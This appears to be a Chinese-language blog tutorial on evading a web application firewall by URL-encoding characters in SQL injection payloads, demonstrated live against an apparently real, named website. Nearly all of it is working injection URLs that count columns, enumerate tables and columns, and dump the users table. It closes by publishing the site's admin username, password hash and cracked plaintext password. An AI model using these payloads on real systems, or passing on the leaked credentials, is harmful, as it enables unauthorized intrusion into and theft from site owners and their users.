WAF繞過方法之URL編碼
實例講解如何利用URL編碼繞過WAF防護
SQL注入點
http://www.magrabiyemen.com/contents.php?id=3
欄位數為4
http://www.magrabiyemen.com/contents.php?id=3 order by 4
顯示位為4
http://www.magrabiyemen.com/contents.php?id=3 union select 1,2,3,4
顯示基本信息正常
http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version())
Advertisements
暴表的時候出現not acceptable
http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()
嘗試繞過,不成功,依然返回上圖所示
http://www.magrabiyemen.com/contents.php?id=3 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()
Advertisements
使用URL編碼成功繞過(t經過URL編碼後為%74)
http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,group_concat(%74able_name) from informa%74ion_schema.tables where %74able_schema=da%74abase()
http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,group_concat(column_name) from informa%74ion_schema.columns where table_name=CHAR(117, 115, 101, 114, 115)
http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,group_concat(username,0x3a,password) from users
admin:ea4ce35c2860112178e8ae2285579919
解密出來為:admin/123456789987654321